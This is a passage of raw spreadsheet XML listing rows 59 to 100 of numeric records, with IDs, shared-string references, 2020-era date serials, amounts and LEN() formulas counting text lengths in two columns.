      <c r="F59" t="s">
        <v>11243</v>
      </c>
      <c r="G59" s="1">
        <v>44041</v>
      </c>
      <c r="H59">
        <v>800000</v>
      </c>
      <c r="I59" t="s">
        <v>11244</v>
      </c>
      <c r="J59" t="s">
        <v>11242</v>
      </c>
      <c r="K59">
        <f>LEN(I59)</f>
        <v>73</v>
      </c>
      <c r="L59">
        <f>LEN(J59)</f>
        <v>119</v>
      </c>
    </row>
    <row r="60" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A60">
        <v>20734</v>
      </c>
      <c r="B60">
        <v>862</v>
      </c>
      <c r="C60" t="s">
        <v>3051</v>
      </c>
      <c r="D60" t="s">
        <v>10942</v>
      </c>
      <c r="E60">
        <v>2</v>
      </c>
      <c r="F60" t="s">
        <v>9437</v>
      </c>
      <c r="G60" s="1">
        <v>43990</v>
      </c>
      <c r="H60">
        <v>300000</v>
      </c>
      <c r="J60" t="s">
        <v>10943</v>
      </c>
      <c r="K60">
        <f>LEN(I60)</f>
        <v>0</v>
      </c>
      <c r="L60">
        <f>LEN(J60)</f>
        <v>118</v>
      </c>
    </row>
    <row r="61" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A61">
        <v>20800</v>
      </c>
      <c r="B61">
        <v>2792</v>
      </c>
      <c r="C61" t="s">
        <v>6992</v>
      </c>
      <c r="D61" t="s">
        <v>10984</v>
      </c>
      <c r="E61">
        <v>32</v>
      </c>
      <c r="F61" t="s">
        <v>6917</v>
      </c>
      <c r="G61" s="1">
        <v>43950</v>
      </c>
      <c r="H61">
        <v>120000</v>
      </c>
      <c r="I61" t="s">
        <v>10988</v>
      </c>
      <c r="J61" t="s">
        <v>10989</v>
      </c>
      <c r="K61">
        <f>LEN(I61)</f>
        <v>105</v>
      </c>
      <c r="L61">
        <f>LEN(J61)</f>
        <v>117</v>
      </c>
    </row>
    <row r="62" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A62">
        <v>20887</v>
      </c>
      <c r="B62">
        <v>716</v>
      </c>
      <c r="C62" t="s">
        <v>1252</v>
      </c>
      <c r="D62" t="s">
        <v>11044</v>
      </c>
      <c r="E62">
        <v>2</v>
      </c>
      <c r="F62" t="s">
        <v>9435</v>
      </c>
      <c r="G62" s="1">
        <v>44055</v>
      </c>
      <c r="H62">
        <v>100000</v>
      </c>
      <c r="J62" t="s">
        <v>11045</v>
      </c>
      <c r="K62">
        <f>LEN(I62)</f>
        <v>0</v>
      </c>
      <c r="L62">
        <f>LEN(J62)</f>
        <v>115</v>
      </c>
    </row>
    <row r="63" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A63">
        <v>20888</v>
      </c>
      <c r="B63">
        <v>716</v>
      </c>
      <c r="C63" t="s">
        <v>1252</v>
      </c>
      <c r="D63" t="s">
        <v>11044</v>
      </c>
      <c r="E63">
        <v>2</v>
      </c>
      <c r="F63" t="s">
        <v>2236</v>
      </c>
      <c r="G63" s="1">
        <v>44055</v>
      </c>
      <c r="H63">
        <v>250000</v>
      </c>
      <c r="J63" t="s">
        <v>11045</v>
      </c>
      <c r="K63">
        <f>LEN(I63)</f>
        <v>0</v>
      </c>
      <c r="L63">
        <f>LEN(J63)</f>
        <v>115</v>
      </c>
    </row>
    <row r="64" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A64">
        <v>20488</v>
      </c>
      <c r="B64">
        <v>2689</v>
      </c>
      <c r="C64" t="s">
        <v>5886</v>
      </c>
      <c r="D64" t="s">
        <v>10747</v>
      </c>
      <c r="E64">
        <v>26</v>
      </c>
      <c r="F64" t="s">
        <v>10750</v>
      </c>
      <c r="G64" s="1">
        <v>43951</v>
      </c>
      <c r="H64">
        <v>84000</v>
      </c>
      <c r="I64" t="s">
        <v>10546</v>
      </c>
      <c r="J64" t="s">
        <v>10751</v>
      </c>
      <c r="K64">
        <f>LEN(I64)</f>
        <v>38</v>
      </c>
      <c r="L64">
        <f>LEN(J64)</f>
        <v>114</v>
      </c>
    </row>
    <row r="65" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A65">
        <v>19386</v>
      </c>
      <c r="B65">
        <v>949</v>
      </c>
      <c r="C65" t="s">
        <v>2621</v>
      </c>
      <c r="D65" t="s">
        <v>9987</v>
      </c>
      <c r="E65">
        <v>17</v>
      </c>
      <c r="F65" t="s">
        <v>9988</v>
      </c>
      <c r="G65" s="1">
        <v>43909</v>
      </c>
      <c r="H65">
        <v>300000</v>
      </c>
      <c r="J65" t="s">
        <v>9989</v>
      </c>
      <c r="K65">
        <f>LEN(I65)</f>
        <v>0</v>
      </c>
      <c r="L65">
        <f>LEN(J65)</f>
        <v>114</v>
      </c>
    </row>
    <row r="66" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A66">
        <v>20104</v>
      </c>
      <c r="B66">
        <v>46</v>
      </c>
      <c r="C66" t="s">
        <v>658</v>
      </c>
      <c r="D66" t="s">
        <v>10470</v>
      </c>
      <c r="E66">
        <v>12</v>
      </c>
      <c r="F66" t="s">
        <v>9437</v>
      </c>
      <c r="G66" s="1">
        <v>43928</v>
      </c>
      <c r="H66">
        <v>200000</v>
      </c>
      <c r="J66" t="s">
        <v>10475</v>
      </c>
      <c r="K66">
        <f>LEN(I66)</f>
        <v>0</v>
      </c>
      <c r="L66">
        <f>LEN(J66)</f>
        <v>114</v>
      </c>
    </row>
    <row r="67" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A67">
        <v>19686</v>
      </c>
      <c r="B67">
        <v>2586</v>
      </c>
      <c r="C67" t="s">
        <v>5264</v>
      </c>
      <c r="D67" t="s">
        <v>10171</v>
      </c>
      <c r="E67">
        <v>12</v>
      </c>
      <c r="F67" t="s">
        <v>9437</v>
      </c>
      <c r="G67" s="1">
        <v>43903</v>
      </c>
      <c r="H67">
        <v>100000</v>
      </c>
      <c r="I67" t="s">
        <v>10174</v>
      </c>
      <c r="J67" t="s">
        <v>10173</v>
      </c>
      <c r="K67">
        <f>LEN(I67)</f>
        <v>115</v>
      </c>
      <c r="L67">
        <f>LEN(J67)</f>
        <v>113</v>
      </c>
    </row>
    <row r="68" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A68">
        <v>19688</v>
      </c>
      <c r="B68">
        <v>2586</v>
      </c>
      <c r="C68" t="s">
        <v>16283</v>
      </c>
      <c r="D68" t="s">
        <v>16284</v>
      </c>
      <c r="E68">
        <v>12</v>
      </c>
      <c r="F68" t="s">
        <v>10176</v>
      </c>
      <c r="G68" s="1">
        <v>43903</v>
      </c>
      <c r="H68" s="4">
        <v>100000</v>
      </c>
      <c r="I68" t="s">
        <v>10177</v>
      </c>
      <c r="J68" t="s">
        <v>10173</v>
      </c>
      <c r="K68">
        <f>LEN(I68)</f>
        <v>115</v>
      </c>
      <c r="L68">
        <f>LEN(J68)</f>
        <v>113</v>
      </c>
    </row>
    <row r="69" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A69">
        <v>19739</v>
      </c>
      <c r="B69">
        <v>2583</v>
      </c>
      <c r="C69" t="s">
        <v>16285</v>
      </c>
      <c r="D69" t="s">
        <v>16286</v>
      </c>
      <c r="E69">
        <v>12</v>
      </c>
      <c r="F69" t="s">
        <v>9437</v>
      </c>
      <c r="G69" s="1">
        <v>43903</v>
      </c>
      <c r="H69" s="4">
        <v>100000</v>
      </c>
      <c r="I69" t="s">
        <v>10174</v>
      </c>
      <c r="J69" t="s">
        <v>10173</v>
      </c>
      <c r="K69">
        <f>LEN(I69)</f>
        <v>115</v>
      </c>
      <c r="L69">
        <f>LEN(J69)</f>
        <v>113</v>
      </c>
    </row>
    <row r="70" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A70">
        <v>19741</v>
      </c>
      <c r="B70">
        <v>2583</v>
      </c>
      <c r="C70" t="s">
        <v>5308</v>
      </c>
      <c r="D70" t="s">
        <v>10215</v>
      </c>
      <c r="E70">
        <v>12</v>
      </c>
      <c r="F70" t="s">
        <v>10218</v>
      </c>
      <c r="G70" s="1">
        <v>43903</v>
      </c>
      <c r="H70">
        <v>100000</v>
      </c>
      <c r="I70" t="s">
        <v>10174</v>
      </c>
      <c r="J70" t="s">
        <v>10173</v>
      </c>
      <c r="K70">
        <f>LEN(I70)</f>
        <v>115</v>
      </c>
      <c r="L70">
        <f>LEN(J70)</f>
        <v>113</v>
      </c>
    </row>
    <row r="71" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A71">
        <v>19743</v>
      </c>
      <c r="B71">
        <v>2583</v>
      </c>
      <c r="C71" t="s">
        <v>5308</v>
      </c>
      <c r="D71" t="s">
        <v>10215</v>
      </c>
      <c r="E71">
        <v>12</v>
      </c>
      <c r="F71" t="s">
        <v>1746</v>
      </c>
      <c r="G71" s="1">
        <v>43903</v>
      </c>
      <c r="H71">
        <v>27000</v>
      </c>
      <c r="I71" t="s">
        <v>10177</v>
      </c>
      <c r="J71" t="s">
        <v>10173</v>
      </c>
      <c r="K71">
        <f>LEN(I71)</f>
        <v>115</v>
      </c>
      <c r="L71">
        <f>LEN(J71)</f>
        <v>113</v>
      </c>
    </row>
    <row r="72" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A72">
        <v>19684</v>
      </c>
      <c r="B72">
        <v>2586</v>
      </c>
      <c r="C72" t="s">
        <v>5264</v>
      </c>
      <c r="D72" t="s">
        <v>10171</v>
      </c>
      <c r="E72">
        <v>12</v>
      </c>
      <c r="F72" t="s">
        <v>10071</v>
      </c>
      <c r="G72" s="1">
        <v>43903</v>
      </c>
      <c r="H72">
        <v>27000</v>
      </c>
      <c r="I72" t="s">
        <v>10172</v>
      </c>
      <c r="J72" t="s">
        <v>10173</v>
      </c>
      <c r="K72">
        <f>LEN(I72)</f>
        <v>110</v>
      </c>
      <c r="L72">
        <f>LEN(J72)</f>
        <v>113</v>
      </c>
    </row>
    <row r="73" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A73">
        <v>19685</v>
      </c>
      <c r="B73">
        <v>2586</v>
      </c>
      <c r="C73" t="s">
        <v>5264</v>
      </c>
      <c r="D73" t="s">
        <v>10171</v>
      </c>
      <c r="E73">
        <v>12</v>
      </c>
      <c r="F73" t="s">
        <v>9435</v>
      </c>
      <c r="G73" s="1">
        <v>43903</v>
      </c>
      <c r="H73">
        <v>27000</v>
      </c>
      <c r="I73" t="s">
        <v>10172</v>
      </c>
      <c r="J73" t="s">
        <v>10173</v>
      </c>
      <c r="K73">
        <f>LEN(I73)</f>
        <v>110</v>
      </c>
      <c r="L73">
        <f>LEN(J73)</f>
        <v>113</v>
      </c>
    </row>
    <row r="74" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A74">
        <v>19687</v>
      </c>
      <c r="B74">
        <v>2586</v>
      </c>
      <c r="C74" t="s">
        <v>5264</v>
      </c>
      <c r="D74" t="s">
        <v>10171</v>
      </c>
      <c r="E74">
        <v>12</v>
      </c>
      <c r="F74" t="s">
        <v>10175</v>
      </c>
      <c r="G74" s="1">
        <v>43903</v>
      </c>
      <c r="H74">
        <v>100000</v>
      </c>
      <c r="I74" t="s">
        <v>10172</v>
      </c>
      <c r="J74" t="s">
        <v>10173</v>
      </c>
      <c r="K74">
        <f>LEN(I74)</f>
        <v>110</v>
      </c>
      <c r="L74">
        <f>LEN(J74)</f>
        <v>113</v>
      </c>
    </row>
    <row r="75" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A75">
        <v>19689</v>
      </c>
      <c r="B75">
        <v>2586</v>
      </c>
      <c r="C75" t="s">
        <v>5264</v>
      </c>
      <c r="D75" t="s">
        <v>10171</v>
      </c>
      <c r="E75">
        <v>12</v>
      </c>
      <c r="F75" t="s">
        <v>2236</v>
      </c>
      <c r="G75" s="1">
        <v>43903</v>
      </c>
      <c r="H75">
        <v>100000</v>
      </c>
      <c r="I75" t="s">
        <v>10172</v>
      </c>
      <c r="J75" t="s">
        <v>10173</v>
      </c>
      <c r="K75">
        <f>LEN(I75)</f>
        <v>110</v>
      </c>
      <c r="L75">
        <f>LEN(J75)</f>
        <v>113</v>
      </c>
    </row>
    <row r="76" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A76">
        <v>19691</v>
      </c>
      <c r="B76">
        <v>2586</v>
      </c>
      <c r="C76" t="s">
        <v>5264</v>
      </c>
      <c r="D76" t="s">
        <v>10171</v>
      </c>
      <c r="E76">
        <v>12</v>
      </c>
      <c r="F76" t="s">
        <v>9459</v>
      </c>
      <c r="G76" s="1">
        <v>43903</v>
      </c>
      <c r="H76">
        <v>27000</v>
      </c>
      <c r="I76" t="s">
        <v>10172</v>
      </c>
      <c r="J76" t="s">
        <v>10173</v>
      </c>
      <c r="K76">
        <f>LEN(I76)</f>
        <v>110</v>
      </c>
      <c r="L76">
        <f>LEN(J76)</f>
        <v>113</v>
      </c>
    </row>
    <row r="77" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A77">
        <v>19692</v>
      </c>
      <c r="B77">
        <v>2586</v>
      </c>
      <c r="C77" t="s">
        <v>5264</v>
      </c>
      <c r="D77" t="s">
        <v>10171</v>
      </c>
      <c r="E77">
        <v>12</v>
      </c>
      <c r="F77" t="s">
        <v>9595</v>
      </c>
      <c r="G77" s="1">
        <v>43903</v>
      </c>
      <c r="H77">
        <v>27000</v>
      </c>
      <c r="I77" t="s">
        <v>10172</v>
      </c>
      <c r="J77" t="s">
        <v>10173</v>
      </c>
      <c r="K77">
        <f>LEN(I77)</f>
        <v>110</v>
      </c>
      <c r="L77">
        <f>LEN(J77)</f>
        <v>113</v>
      </c>
    </row>
    <row r="78" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A78">
        <v>19742</v>
      </c>
      <c r="B78">
        <v>2583</v>
      </c>
      <c r="C78" t="s">
        <v>5308</v>
      </c>
      <c r="D78" t="s">
        <v>10215</v>
      </c>
      <c r="E78">
        <v>12</v>
      </c>
      <c r="F78" t="s">
        <v>2236</v>
      </c>
      <c r="G78" s="1">
        <v>43903</v>
      </c>
      <c r="H78">
        <v>100000</v>
      </c>
      <c r="I78" t="s">
        <v>10172</v>
      </c>
      <c r="J78" t="s">
        <v>10173</v>
      </c>
      <c r="K78">
        <f>LEN(I78)</f>
        <v>110</v>
      </c>
      <c r="L78">
        <f>LEN(J78)</f>
        <v>113</v>
      </c>
    </row>
    <row r="79" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A79">
        <v>19747</v>
      </c>
      <c r="B79">
        <v>2583</v>
      </c>
      <c r="C79" t="s">
        <v>5308</v>
      </c>
      <c r="D79" t="s">
        <v>10215</v>
      </c>
      <c r="E79">
        <v>12</v>
      </c>
      <c r="F79" t="s">
        <v>9595</v>
      </c>
      <c r="G79" s="1">
        <v>43903</v>
      </c>
      <c r="H79">
        <v>27000</v>
      </c>
      <c r="I79" t="s">
        <v>10172</v>
      </c>
      <c r="J79" t="s">
        <v>10173</v>
      </c>
      <c r="K79">
        <f>LEN(I79)</f>
        <v>110</v>
      </c>
      <c r="L79">
        <f>LEN(J79)</f>
        <v>113</v>
      </c>
    </row>
    <row r="80" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A80">
        <v>19748</v>
      </c>
      <c r="B80">
        <v>2583</v>
      </c>
      <c r="C80" t="s">
        <v>5308</v>
      </c>
      <c r="D80" t="s">
        <v>10215</v>
      </c>
      <c r="E80">
        <v>12</v>
      </c>
      <c r="F80" t="s">
        <v>9435</v>
      </c>
      <c r="G80" s="1">
        <v>43903</v>
      </c>
      <c r="H80">
        <v>27000</v>
      </c>
      <c r="I80" t="s">
        <v>10172</v>
      </c>
      <c r="J80" t="s">
        <v>10173</v>
      </c>
      <c r="K80">
        <f>LEN(I80)</f>
        <v>110</v>
      </c>
      <c r="L80">
        <f>LEN(J80)</f>
        <v>113</v>
      </c>
    </row>
    <row r="81" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A81">
        <v>19690</v>
      </c>
      <c r="B81">
        <v>2586</v>
      </c>
      <c r="C81" t="s">
        <v>5264</v>
      </c>
      <c r="D81" t="s">
        <v>10171</v>
      </c>
      <c r="E81">
        <v>12</v>
      </c>
      <c r="F81" t="s">
        <v>1746</v>
      </c>
      <c r="G81" s="1">
        <v>43903</v>
      </c>
      <c r="H81">
        <v>27000</v>
      </c>
      <c r="I81" t="s">
        <v>10178</v>
      </c>
      <c r="J81" t="s">
        <v>10173</v>
      </c>
      <c r="K81">
        <f>LEN(I81)</f>
        <v>89</v>
      </c>
      <c r="L81">
        <f>LEN(J81)</f>
        <v>113</v>
      </c>
    </row>
    <row r="82" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A82">
        <v>19746</v>
      </c>
      <c r="B82">
        <v>2583</v>
      </c>
      <c r="C82" t="s">
        <v>5308</v>
      </c>
      <c r="D82" t="s">
        <v>10215</v>
      </c>
      <c r="E82">
        <v>12</v>
      </c>
      <c r="F82" t="s">
        <v>9438</v>
      </c>
      <c r="G82" s="1">
        <v>43903</v>
      </c>
      <c r="H82">
        <v>100000</v>
      </c>
      <c r="I82" t="s">
        <v>10219</v>
      </c>
      <c r="J82" t="s">
        <v>10173</v>
      </c>
      <c r="K82">
        <f>LEN(I82)</f>
        <v>74</v>
      </c>
      <c r="L82">
        <f>LEN(J82)</f>
        <v>113</v>
      </c>
    </row>
    <row r="83" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A83">
        <v>19744</v>
      </c>
      <c r="B83">
        <v>2583</v>
      </c>
      <c r="C83" t="s">
        <v>5308</v>
      </c>
      <c r="D83" t="s">
        <v>10215</v>
      </c>
      <c r="E83">
        <v>12</v>
      </c>
      <c r="F83" t="s">
        <v>9459</v>
      </c>
      <c r="G83" s="1">
        <v>43903</v>
      </c>
      <c r="H83">
        <v>27000</v>
      </c>
      <c r="I83" t="s">
        <v>9550</v>
      </c>
      <c r="J83" t="s">
        <v>10173</v>
      </c>
      <c r="K83">
        <f>LEN(I83)</f>
        <v>18</v>
      </c>
      <c r="L83">
        <f>LEN(J83)</f>
        <v>113</v>
      </c>
    </row>
    <row r="84" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A84">
        <v>19745</v>
      </c>
      <c r="B84">
        <v>2583</v>
      </c>
      <c r="C84" t="s">
        <v>5308</v>
      </c>
      <c r="D84" t="s">
        <v>10215</v>
      </c>
      <c r="E84">
        <v>12</v>
      </c>
      <c r="F84" t="s">
        <v>10071</v>
      </c>
      <c r="G84" s="1">
        <v>43903</v>
      </c>
      <c r="H84">
        <v>27000</v>
      </c>
      <c r="I84" t="s">
        <v>9550</v>
      </c>
      <c r="J84" t="s">
        <v>10173</v>
      </c>
      <c r="K84">
        <f>LEN(I84)</f>
        <v>18</v>
      </c>
      <c r="L84">
        <f>LEN(J84)</f>
        <v>113</v>
      </c>
    </row>
    <row r="85" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A85">
        <v>20450</v>
      </c>
      <c r="B85">
        <v>390</v>
      </c>
      <c r="C85" t="s">
        <v>942</v>
      </c>
      <c r="D85" t="s">
        <v>10726</v>
      </c>
      <c r="E85">
        <v>16</v>
      </c>
      <c r="F85" t="s">
        <v>945</v>
      </c>
      <c r="G85" s="1">
        <v>43945</v>
      </c>
      <c r="H85">
        <v>18080000</v>
      </c>
      <c r="J85" t="s">
        <v>10727</v>
      </c>
      <c r="K85">
        <f>LEN(I85)</f>
        <v>0</v>
      </c>
      <c r="L85">
        <f>LEN(J85)</f>
        <v>113</v>
      </c>
    </row>
    <row r="86" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A86">
        <v>17157</v>
      </c>
      <c r="B86">
        <v>2255</v>
      </c>
      <c r="C86" t="s">
        <v>4868</v>
      </c>
      <c r="D86" t="s">
        <v>9685</v>
      </c>
      <c r="E86">
        <v>16</v>
      </c>
      <c r="F86" t="s">
        <v>1746</v>
      </c>
      <c r="G86" s="1">
        <v>44032</v>
      </c>
      <c r="H86">
        <v>100000</v>
      </c>
      <c r="I86" t="s">
        <v>9691</v>
      </c>
      <c r="J86" t="s">
        <v>9692</v>
      </c>
      <c r="K86">
        <f>LEN(I86)</f>
        <v>68</v>
      </c>
      <c r="L86">
        <f>LEN(J86)</f>
        <v>112</v>
      </c>
    </row>
    <row r="87" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A87">
        <v>20044</v>
      </c>
      <c r="B87">
        <v>680</v>
      </c>
      <c r="C87" t="s">
        <v>16287</v>
      </c>
      <c r="D87" t="s">
        <v>16288</v>
      </c>
      <c r="E87">
        <v>17</v>
      </c>
      <c r="F87" t="s">
        <v>2236</v>
      </c>
      <c r="G87" s="1">
        <v>43993</v>
      </c>
      <c r="H87" s="4">
        <v>320823</v>
      </c>
      <c r="I87" t="s">
        <v>10430</v>
      </c>
      <c r="J87" t="s">
        <v>10429</v>
      </c>
      <c r="K87">
        <f>LEN(I87)</f>
        <v>99</v>
      </c>
      <c r="L87">
        <f>LEN(J87)</f>
        <v>111</v>
      </c>
    </row>
    <row r="88" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A88">
        <v>20045</v>
      </c>
      <c r="B88">
        <v>680</v>
      </c>
      <c r="C88" t="s">
        <v>16287</v>
      </c>
      <c r="D88" t="s">
        <v>16288</v>
      </c>
      <c r="E88">
        <v>17</v>
      </c>
      <c r="F88" t="s">
        <v>10431</v>
      </c>
      <c r="G88" s="1">
        <v>43993</v>
      </c>
      <c r="H88" s="4">
        <v>461835</v>
      </c>
      <c r="I88" t="s">
        <v>10432</v>
      </c>
      <c r="J88" t="s">
        <v>10429</v>
      </c>
      <c r="K88">
        <f>LEN(I88)</f>
        <v>95</v>
      </c>
      <c r="L88">
        <f>LEN(J88)</f>
        <v>111</v>
      </c>
    </row>
    <row r="89" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A89">
        <v>20046</v>
      </c>
      <c r="B89">
        <v>680</v>
      </c>
      <c r="C89" t="s">
        <v>16287</v>
      </c>
      <c r="D89" t="s">
        <v>16288</v>
      </c>
      <c r="E89">
        <v>17</v>
      </c>
      <c r="F89" t="s">
        <v>10071</v>
      </c>
      <c r="G89" s="1">
        <v>43993</v>
      </c>
      <c r="H89" s="4">
        <v>62778</v>
      </c>
      <c r="I89" t="s">
        <v>10433</v>
      </c>
      <c r="J89" t="s">
        <v>10429</v>
      </c>
      <c r="K89">
        <f>LEN(I89)</f>
        <v>75</v>
      </c>
      <c r="L89">
        <f>LEN(J89)</f>
        <v>111</v>
      </c>
    </row>
    <row r="90" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A90">
        <v>20043</v>
      </c>
      <c r="B90">
        <v>680</v>
      </c>
      <c r="C90" t="s">
        <v>689</v>
      </c>
      <c r="D90" t="s">
        <v>9796</v>
      </c>
      <c r="E90">
        <v>17</v>
      </c>
      <c r="F90" t="s">
        <v>4686</v>
      </c>
      <c r="G90" s="1">
        <v>43993</v>
      </c>
      <c r="H90">
        <v>0</v>
      </c>
      <c r="I90" t="s">
        <v>10428</v>
      </c>
      <c r="J90" t="s">
        <v>10429</v>
      </c>
      <c r="K90">
        <f>LEN(I90)</f>
        <v>70</v>
      </c>
      <c r="L90">
        <f>LEN(J90)</f>
        <v>111</v>
      </c>
    </row>
    <row r="91" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A91">
        <v>19435</v>
      </c>
      <c r="B91">
        <v>2579</v>
      </c>
      <c r="C91" t="s">
        <v>5115</v>
      </c>
      <c r="D91" t="s">
        <v>10038</v>
      </c>
      <c r="E91">
        <v>12</v>
      </c>
      <c r="F91" t="s">
        <v>9459</v>
      </c>
      <c r="G91" s="1">
        <v>43902</v>
      </c>
      <c r="H91">
        <v>6000</v>
      </c>
      <c r="J91" t="s">
        <v>10040</v>
      </c>
      <c r="K91">
        <f>LEN(I91)</f>
        <v>0</v>
      </c>
      <c r="L91">
        <f>LEN(J91)</f>
        <v>110</v>
      </c>
    </row>
    <row r="92" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A92">
        <v>19854</v>
      </c>
      <c r="B92">
        <v>2629</v>
      </c>
      <c r="C92" t="s">
        <v>5453</v>
      </c>
      <c r="D92" t="s">
        <v>10289</v>
      </c>
      <c r="E92">
        <v>1</v>
      </c>
      <c r="F92" t="s">
        <v>5434</v>
      </c>
      <c r="G92" s="1">
        <v>43888</v>
      </c>
      <c r="H92">
        <v>0</v>
      </c>
      <c r="J92" t="s">
        <v>10290</v>
      </c>
      <c r="K92">
        <f>LEN(I92)</f>
        <v>0</v>
      </c>
      <c r="L92">
        <f>LEN(J92)</f>
        <v>110</v>
      </c>
    </row>
    <row r="93" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A93">
        <v>19855</v>
      </c>
      <c r="B93">
        <v>2629</v>
      </c>
      <c r="C93" t="s">
        <v>5453</v>
      </c>
      <c r="D93" t="s">
        <v>10289</v>
      </c>
      <c r="E93">
        <v>1</v>
      </c>
      <c r="F93" t="s">
        <v>9217</v>
      </c>
      <c r="G93" s="1">
        <v>43888</v>
      </c>
      <c r="H93">
        <v>0</v>
      </c>
      <c r="J93" t="s">
        <v>10290</v>
      </c>
      <c r="K93">
        <f>LEN(I93)</f>
        <v>0</v>
      </c>
      <c r="L93">
        <f>LEN(J93)</f>
        <v>110</v>
      </c>
    </row>
    <row r="94" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A94">
        <v>19858</v>
      </c>
      <c r="B94">
        <v>2629</v>
      </c>
      <c r="C94" t="s">
        <v>5453</v>
      </c>
      <c r="D94" t="s">
        <v>10289</v>
      </c>
      <c r="E94">
        <v>1</v>
      </c>
      <c r="F94" t="s">
        <v>3814</v>
      </c>
      <c r="G94" s="1">
        <v>43887</v>
      </c>
      <c r="H94">
        <v>0</v>
      </c>
      <c r="J94" t="s">
        <v>10290</v>
      </c>
      <c r="K94">
        <f>LEN(I94)</f>
        <v>0</v>
      </c>
      <c r="L94">
        <f>LEN(J94)</f>
        <v>110</v>
      </c>
    </row>
    <row r="95" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A95">
        <v>20783</v>
      </c>
      <c r="B95">
        <v>186</v>
      </c>
      <c r="C95" t="s">
        <v>1236</v>
      </c>
      <c r="D95" t="s">
        <v>9800</v>
      </c>
      <c r="E95">
        <v>12</v>
      </c>
      <c r="F95" t="s">
        <v>10976</v>
      </c>
      <c r="G95" s="1">
        <v>43984</v>
      </c>
      <c r="H95">
        <v>276000</v>
      </c>
      <c r="J95" t="s">
        <v>10977</v>
      </c>
      <c r="K95">
        <f>LEN(I95)</f>
        <v>0</v>
      </c>
      <c r="L95">
        <f>LEN(J95)</f>
        <v>109</v>
      </c>
    </row>
    <row r="96" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A96">
        <v>20784</v>
      </c>
      <c r="B96">
        <v>186</v>
      </c>
      <c r="C96" t="s">
        <v>1236</v>
      </c>
      <c r="D96" t="s">
        <v>9800</v>
      </c>
      <c r="E96">
        <v>12</v>
      </c>
      <c r="F96" t="s">
        <v>10978</v>
      </c>
      <c r="G96" s="1">
        <v>43984</v>
      </c>
      <c r="H96">
        <v>260000</v>
      </c>
      <c r="J96" t="s">
        <v>10977</v>
      </c>
      <c r="K96">
        <f>LEN(I96)</f>
        <v>0</v>
      </c>
      <c r="L96">
        <f>LEN(J96)</f>
        <v>109</v>
      </c>
    </row>
    <row r="97" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A97">
        <v>20785</v>
      </c>
      <c r="B97">
        <v>186</v>
      </c>
      <c r="C97" t="s">
        <v>1236</v>
      </c>
      <c r="D97" t="s">
        <v>9800</v>
      </c>
      <c r="E97">
        <v>12</v>
      </c>
      <c r="F97" t="s">
        <v>10979</v>
      </c>
      <c r="G97" s="1">
        <v>43984</v>
      </c>
      <c r="H97">
        <v>245000</v>
      </c>
      <c r="J97" t="s">
        <v>10977</v>
      </c>
      <c r="K97">
        <f>LEN(I97)</f>
        <v>0</v>
      </c>
      <c r="L97">
        <f>LEN(J97)</f>
        <v>109</v>
      </c>
    </row>
    <row r="98" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A98">
        <v>20739</v>
      </c>
      <c r="B98">
        <v>888</v>
      </c>
      <c r="C98" t="s">
        <v>3000</v>
      </c>
      <c r="D98" t="s">
        <v>10947</v>
      </c>
      <c r="E98">
        <v>12</v>
      </c>
      <c r="F98" t="s">
        <v>10950</v>
      </c>
      <c r="G98" s="1">
        <v>43984</v>
      </c>
      <c r="H98">
        <v>6757720</v>
      </c>
      <c r="I98" t="s">
        <v>10029</v>
      </c>
      <c r="J98" t="s">
        <v>10951</v>
      </c>
      <c r="K98">
        <f>LEN(I98)</f>
        <v>233</v>
      </c>
      <c r="L98">
        <f>LEN(J98)</f>
        <v>106</v>
      </c>
    </row>
    <row r="99" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A99">
        <v>19740</v>
      </c>
      <c r="B99">
        <v>2583</v>
      </c>
      <c r="C99" t="s">
        <v>16285</v>
      </c>
      <c r="D99" t="s">
        <v>16286</v>
      </c>
      <c r="E99">
        <v>12</v>
      </c>
      <c r="F99" t="s">
        <v>10216</v>
      </c>
      <c r="G99" s="1">
        <v>43903</v>
      </c>
      <c r="H99" s="4">
        <v>100000</v>
      </c>
      <c r="I99" t="s">
        <v>10174</v>
      </c>
      <c r="J99" t="s">
        <v>10217</v>
      </c>
      <c r="K99">
        <f>LEN(I99)</f>
        <v>115</v>
      </c>
      <c r="L99">
        <f>LEN(J99)</f>
        <v>106</v>
      </c>
    </row>
    <row r="100" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A100">
        <v>19693</v>
      </c>
      <c r="B100">
        <v>2586</v>
      </c>
      <c r="C100" t="s">
        <v>5264</v>
      </c>
      <c r="D100" t="s">
        <v>10171</v>
      </c>
      <c r="E100">
        <v>12</v>
      </c>
      <c r="F100" t="s">
        <v>9438</v>
